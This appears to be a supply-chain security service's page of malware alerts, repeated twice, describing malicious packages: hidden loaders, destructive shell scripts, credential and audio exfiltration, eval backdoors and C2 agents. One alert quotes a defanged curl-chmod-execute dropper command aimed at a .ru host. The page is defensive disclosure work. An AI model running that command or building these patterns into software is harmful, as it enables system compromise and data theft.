Secure your dependencies. Ship with confidence.

This module’s entrypoint (index.js) immediately launches a detached, unobserved Node.js child process executing the local script ./lib/caller.js, passing it JSON-serialized arguments. The spawn call uses { detached: true, stdio: 'ignore' } combined with child.unref(), which ensures the background process continues after the parent exits and suppresses all output or errors. Such a pattern is frequently used to hide backdoor or exfiltration routines in supply-chain attacks. Since all sensitive activity is delegated to the concealed lib/caller.js and no logs or errors are surfaced, this code functions as a stealthy loader for arbitrary malicious payloads. Do not use or publish this package until every invocation of ./lib/caller.js is audited and its behavior fully understood.

Malicious bash initialization script that performs destructive filesystem operations on macOS systems. When the external helper script 'isuserdarwin.sh' returns true, the script silently executes 'sudo rm -rf' to delete critical user directories including ~/Applications, ~/Movies, ~/Music, ~/Pictures, ~/Public, and ~/Sites without user confirmation. It also removes the macOS sleepimage file at /private/var/vm/sleepimage. The script modifies SSH directory permissions using 'sudo chmod -R go-rw' which can break SSH access or expose credentials. All destructive operations have their output suppressed with '>/dev/null 2>&1' to hide failures and make the actions stealthy. The script uses eval to execute the output of /usr/bin/dircolors, creating a command injection risk if the binary is compromised. It depends on external scripts (paper.sh, isuserdarwin.sh, debug.sh) whose contents are unknown and could execute arbitrary code. The destructive operations are embedded within what appears to be routine shell configuration code, likely to disguise the malicious intent.

This fragment is structured as an offensive exploit module: it accepts attacker-controlled targets, probes via HTTP GET, and—if conditions appear favorable—sends an HTTP POST intended to trigger an unauthenticated RCE against Cisco RV320/RV325. Although the concrete exploit payload/body is not visible here (likely constructed in HTTPClient or imported helpers), the check→exploit control flow, exploitation semantics, and exploit metadata indicate high malicious intent. Additional risk stems from wildcard imports and dependence on external code for the actual payload content.

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

This skill is an operational offensive pentesting playbook for SSH that contains complete, actionable instructions to discover, brute-force, exploit, persist, and pivot via SSH. The content is highly dangerous if used without strict authorization and controls: it facilitates credential harvesting, remote command execution, backdoor installation (authorized_keys), and evasion techniques. As a skill for an AI agent, it is high risk because it provides explicit commands and scripts that an agent could run to perform real-world attacks. Use is appropriate only in controlled, authorized penetration-testing environments with human oversight; it should not be available to untrusted agents or users. I assess high security risk and high likelihood of misuse.

This assembly contains a large, intentionally obfuscated bootstrap/loader that reads embedded data, decrypts it and writes/executess native code in process memory using VirtualAlloc/VirtualProtect/Marshal and function-pointer delegates. Those behaviors are strong indicators of a runtime loader/packer and are characteristic of malicious loaders/backdoors. Even if the public API surface is legitimate (LEADTOOLS), the hidden bootstrap introduces a high-risk supply-chain capability: arbitrary native code execution at load time. I recommend not using this package without a complete investigation (extracting and statically analyzing/decrypting the embedded payload, and running in a controlled sandbox). Treat it as potentially malicious and block or isolate until proven safe.

The code poses a significant risk to users due to its ability to extract sensitive data from browsers without consent and potentially conduct malicious activities.

Live on pypi for 5 days, 23 hours and 17 minutes before removal. Socket users were protected even while the package was live.

The file contains heavily obfuscated code that performs anti-detection checks and executes potentially malicious remote code. It includes functionality to: 1) Decode base64-encoded strings, 2) Check for virtual machines using MAC address detection, 3) Verify system resources like CPU cores and memory to detect sandbox environments, 4) Make HTTP requests to remote servers, and 5) Execute arbitrary code received from these servers using eval(). These behaviors are typical of malware attempting to evade detection while establishing remote command and control capabilities.

This code fragment does not contain traditional malware (no shell/backdoor/cryptominer or obfuscated payload). However it presents a high privacy and data-exfiltration risk: it collects arbitrary repository files, attachments, and crawl logs and sends them to an external AI gateway without redaction, filtering, or controls. The system prompt explicitly encourages including API keys if provided, increasing the chance of secret leakage. Treat this module as potentially dangerous in sensitive environments and avoid running it with access to private credentials or production data unless you trust and audit the AIGateway endpoint and the read_file_content/process_image_files implementations.

Live on pypi for 5 days, 10 hours and 41 minutes before removal. Socket users were protected even while the package was live.

This script automates privileged package/trust changes and performs an explicit secret retrieval-and-use workflow: it clones a repository named 'secrets', decrypts github-pat.gpg and pipes the plaintext into `gh auth login --with-token`. That sequence yields immediate high-risk credential usage and persistence (git credential cache). Do not run this code in a trusted environment. Treat as malicious or highly dangerous: investigate the remote repository, the provenance of the script, and any systems where it may have been executed.

High risk due to embedded remote-loading payloads and dynamic code generation that can fetch and execute code at runtime within Docker/host contexts. Treat as malware or, at minimum, a dangerous downloader/dropper. Only use in strictly isolated environments with zero trust inputs, complete sandboxing, and exhaustive code provenance reviews. If this is a packaging artifact, remove or refactor to eliminate dynamic, remote code execution paths and opaque payloads.

The code downloads an external tarball over HTTP and unpacks it into the project tree without integrity checks or extraction safeguards. This creates significant supply-chain and filesystem risks, including MITM tampering, path traversal during extraction, and potential overwriting of project files. Improvements should enforce TLS, verify integrity (hash or signature), validate archive contents, and use safe extraction paths or sandboxed extraction, along with robust error handling and explicit version pinning.

This module performs unsolicited collection of host identifying information (uname -a) and exfiltrates it, with a timestamp, to a hardcoded external IP over plaintext HTTP immediately on module load. The behavior fits likely malicious telemetry/backdoor patterns. Do not use this package in trusted supply chains; remove and audit any systems that have imported it.

The module performs a synchronous read of a hard-coded local file likely containing sensitive data and exposes that data via module exports immediately on import. While there's no direct network exfiltration or remote command execution in this snippet, the behavior enables local-secret disclosure to any importer and is inappropriate for a benign library dependency. Treat as high security risk: avoid importing untrusted packages that read well-known secret locations or audit them thoroughly. The code itself is not obfuscated, but its intent (secret harvesting) is suspicious.

The package will execute a local install-time script (postinstall.cjs) which can run arbitrary Node.js code on install — this is the main risk. Additionally, the presence of pm2 as a dependency plus bip40-related pm2 scripts suggests the package may install or manage background processes. The devDependency pointing to "." is a non-registry specifier and should be treated as a supply-chain risk (requires review of what that local dependency contains). You should inspect the contents of postinstall.cjs (and any files it spawns or downloads) before allowing installation. If you cannot review the script, treat the package as potentially unsafe.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

This assembly contains heavy obfuscation and a complex runtime loader that decrypts/validates embedded payloads, allocates and writes executable memory, and creates delegates/native-callable wrappers to execute that memory. Those behaviors are not appropriate for a benign Revit utility library and are classic indicators of a malicious loader/backdoor or a closed-source protector/packer. Even if the payload is legitimate (e.g., licensing code), its presence in a public package introduces severe supply-chain risk because it can execute arbitrary native code at runtime. I recommend treating this package as malicious/untrusted until the embedded payload and its intent are fully and transparently explained and reviewed. Do not run it in trusted environments.

High likelihood of malicious/surveillance behavior: the code records microphone audio, compresses it, base64-encodes it, and exfiltrates it via Socket.IO/WebSocket to a hardcoded external endpoint (wss://10as17533eu85.vicp.fun). This goes beyond benign recording/compression and matches audio-stealing patterns. Recommend treating the package/module as high risk and performing IOC/policy review, network egress controls, and dependency provenance verification.

The code has unusual patterns and possible security risks associated with updating system software and handling user data. While there is no direct evidence of intentional malware, the behaviors present potential vulnerabilities that could be exploited.

This script is highly suspicious and likely malicious. It downloads and executes remote code, which could lead to unauthorized access or other malicious activities on the system.

Live on npm for 16 minutes before removal. Socket users were protected even while the package was live.

This module is a high-confidence remote code execution/backdoor pattern: it dispatches incoming messages and, on `launch`, evaluates attacker-controlled strings from `body.commands` using `eval()` without any safeguards. Any attacker influence over the listener inputs would allow arbitrary JavaScript execution in the host process. Error logging may further leak details to logs.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is a highly suspicious backdoor-style payload. It drops and runs a detached agent, connects to a hardcoded WebSocket C2 server, harvests sensitive local credential material (notably SSH private keys and other config/keys), exfiltrates that data to the C2, and provides remote arbitrary command execution with results sent back to the server. It should be treated as malicious and not used or allowed to run in any production or user environment.

[Skill Scanner] Pipe-to-shell or eval pattern detected (AITech 9.1.4) [CI013]

This module’s entrypoint (index.js) immediately launches a detached, unobserved Node.js child process executing the local script ./lib/caller.js, passing it JSON-serialized arguments. The spawn call uses { detached: true, stdio: 'ignore' } combined with child.unref(), which ensures the background process continues after the parent exits and suppresses all output or errors. Such a pattern is frequently used to hide backdoor or exfiltration routines in supply-chain attacks. Since all sensitive activity is delegated to the concealed lib/caller.js and no logs or errors are surfaced, this code functions as a stealthy loader for arbitrary malicious payloads. Do not use or publish this package until every invocation of ./lib/caller.js is audited and its behavior fully understood.

Malicious bash initialization script that performs destructive filesystem operations on macOS systems. When the external helper script 'isuserdarwin.sh' returns true, the script silently executes 'sudo rm -rf' to delete critical user directories including ~/Applications, ~/Movies, ~/Music, ~/Pictures, ~/Public, and ~/Sites without user confirmation. It also removes the macOS sleepimage file at /private/var/vm/sleepimage. The script modifies SSH directory permissions using 'sudo chmod -R go-rw' which can break SSH access or expose credentials. All destructive operations have their output suppressed with '>/dev/null 2>&1' to hide failures and make the actions stealthy. The script uses eval to execute the output of /usr/bin/dircolors, creating a command injection risk if the binary is compromised. It depends on external scripts (paper.sh, isuserdarwin.sh, debug.sh) whose contents are unknown and could execute arbitrary code. The destructive operations are embedded within what appears to be routine shell configuration code, likely to disguise the malicious intent.

This fragment is structured as an offensive exploit module: it accepts attacker-controlled targets, probes via HTTP GET, and—if conditions appear favorable—sends an HTTP POST intended to trigger an unauthenticated RCE against Cisco RV320/RV325. Although the concrete exploit payload/body is not visible here (likely constructed in HTTPClient or imported helpers), the check→exploit control flow, exploitation semantics, and exploit metadata indicate high malicious intent. Additional risk stems from wildcard imports and dependence on external code for the actual payload content.

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

This skill is an operational offensive pentesting playbook for SSH that contains complete, actionable instructions to discover, brute-force, exploit, persist, and pivot via SSH. The content is highly dangerous if used without strict authorization and controls: it facilitates credential harvesting, remote command execution, backdoor installation (authorized_keys), and evasion techniques. As a skill for an AI agent, it is high risk because it provides explicit commands and scripts that an agent could run to perform real-world attacks. Use is appropriate only in controlled, authorized penetration-testing environments with human oversight; it should not be available to untrusted agents or users. I assess high security risk and high likelihood of misuse.

This assembly contains a large, intentionally obfuscated bootstrap/loader that reads embedded data, decrypts it and writes/executess native code in process memory using VirtualAlloc/VirtualProtect/Marshal and function-pointer delegates. Those behaviors are strong indicators of a runtime loader/packer and are characteristic of malicious loaders/backdoors. Even if the public API surface is legitimate (LEADTOOLS), the hidden bootstrap introduces a high-risk supply-chain capability: arbitrary native code execution at load time. I recommend not using this package without a complete investigation (extracting and statically analyzing/decrypting the embedded payload, and running in a controlled sandbox). Treat it as potentially malicious and block or isolate until proven safe.

The code poses a significant risk to users due to its ability to extract sensitive data from browsers without consent and potentially conduct malicious activities.

Live on pypi for 5 days, 23 hours and 17 minutes before removal. Socket users were protected even while the package was live.

The file contains heavily obfuscated code that performs anti-detection checks and executes potentially malicious remote code. It includes functionality to: 1) Decode base64-encoded strings, 2) Check for virtual machines using MAC address detection, 3) Verify system resources like CPU cores and memory to detect sandbox environments, 4) Make HTTP requests to remote servers, and 5) Execute arbitrary code received from these servers using eval(). These behaviors are typical of malware attempting to evade detection while establishing remote command and control capabilities.

This code fragment does not contain traditional malware (no shell/backdoor/cryptominer or obfuscated payload). However it presents a high privacy and data-exfiltration risk: it collects arbitrary repository files, attachments, and crawl logs and sends them to an external AI gateway without redaction, filtering, or controls. The system prompt explicitly encourages including API keys if provided, increasing the chance of secret leakage. Treat this module as potentially dangerous in sensitive environments and avoid running it with access to private credentials or production data unless you trust and audit the AIGateway endpoint and the read_file_content/process_image_files implementations.

Live on pypi for 5 days, 10 hours and 41 minutes before removal. Socket users were protected even while the package was live.

This script automates privileged package/trust changes and performs an explicit secret retrieval-and-use workflow: it clones a repository named 'secrets', decrypts github-pat.gpg and pipes the plaintext into `gh auth login --with-token`. That sequence yields immediate high-risk credential usage and persistence (git credential cache). Do not run this code in a trusted environment. Treat as malicious or highly dangerous: investigate the remote repository, the provenance of the script, and any systems where it may have been executed.

High risk due to embedded remote-loading payloads and dynamic code generation that can fetch and execute code at runtime within Docker/host contexts. Treat as malware or, at minimum, a dangerous downloader/dropper. Only use in strictly isolated environments with zero trust inputs, complete sandboxing, and exhaustive code provenance reviews. If this is a packaging artifact, remove or refactor to eliminate dynamic, remote code execution paths and opaque payloads.

The code downloads an external tarball over HTTP and unpacks it into the project tree without integrity checks or extraction safeguards. This creates significant supply-chain and filesystem risks, including MITM tampering, path traversal during extraction, and potential overwriting of project files. Improvements should enforce TLS, verify integrity (hash or signature), validate archive contents, and use safe extraction paths or sandboxed extraction, along with robust error handling and explicit version pinning.

This module performs unsolicited collection of host identifying information (uname -a) and exfiltrates it, with a timestamp, to a hardcoded external IP over plaintext HTTP immediately on module load. The behavior fits likely malicious telemetry/backdoor patterns. Do not use this package in trusted supply chains; remove and audit any systems that have imported it.

The module performs a synchronous read of a hard-coded local file likely containing sensitive data and exposes that data via module exports immediately on import. While there's no direct network exfiltration or remote command execution in this snippet, the behavior enables local-secret disclosure to any importer and is inappropriate for a benign library dependency. Treat as high security risk: avoid importing untrusted packages that read well-known secret locations or audit them thoroughly. The code itself is not obfuscated, but its intent (secret harvesting) is suspicious.

The package will execute a local install-time script (postinstall.cjs) which can run arbitrary Node.js code on install — this is the main risk. Additionally, the presence of pm2 as a dependency plus bip40-related pm2 scripts suggests the package may install or manage background processes. The devDependency pointing to "." is a non-registry specifier and should be treated as a supply-chain risk (requires review of what that local dependency contains). You should inspect the contents of postinstall.cjs (and any files it spawns or downloads) before allowing installation. If you cannot review the script, treat the package as potentially unsafe.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

This assembly contains heavy obfuscation and a complex runtime loader that decrypts/validates embedded payloads, allocates and writes executable memory, and creates delegates/native-callable wrappers to execute that memory. Those behaviors are not appropriate for a benign Revit utility library and are classic indicators of a malicious loader/backdoor or a closed-source protector/packer. Even if the payload is legitimate (e.g., licensing code), its presence in a public package introduces severe supply-chain risk because it can execute arbitrary native code at runtime. I recommend treating this package as malicious/untrusted until the embedded payload and its intent are fully and transparently explained and reviewed. Do not run it in trusted environments.

High likelihood of malicious/surveillance behavior: the code records microphone audio, compresses it, base64-encodes it, and exfiltrates it via Socket.IO/WebSocket to a hardcoded external endpoint (wss://10as17533eu85.vicp.fun). This goes beyond benign recording/compression and matches audio-stealing patterns. Recommend treating the package/module as high risk and performing IOC/policy review, network egress controls, and dependency provenance verification.

The code has unusual patterns and possible security risks associated with updating system software and handling user data. While there is no direct evidence of intentional malware, the behaviors present potential vulnerabilities that could be exploited.

This script is highly suspicious and likely malicious. It downloads and executes remote code, which could lead to unauthorized access or other malicious activities on the system.

Live on npm for 16 minutes before removal. Socket users were protected even while the package was live.

This module is a high-confidence remote code execution/backdoor pattern: it dispatches incoming messages and, on `launch`, evaluates attacker-controlled strings from `body.commands` using `eval()` without any safeguards. Any attacker influence over the listener inputs would allow arbitrary JavaScript execution in the host process. Error logging may further leak details to logs.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is a highly suspicious backdoor-style payload. It drops and runs a detached agent, connects to a hardcoded WebSocket C2 server, harvests sensitive local credential material (notably SSH private keys and other config/keys), exfiltrates that data to the C2, and provides remote arbitrary command execution with results sent back to the server. It should be treated as malicious and not used or allowed to run in any production or user environment.

[Skill Scanner] Pipe-to-shell or eval pattern detected (AITech 9.1.4) [CI013]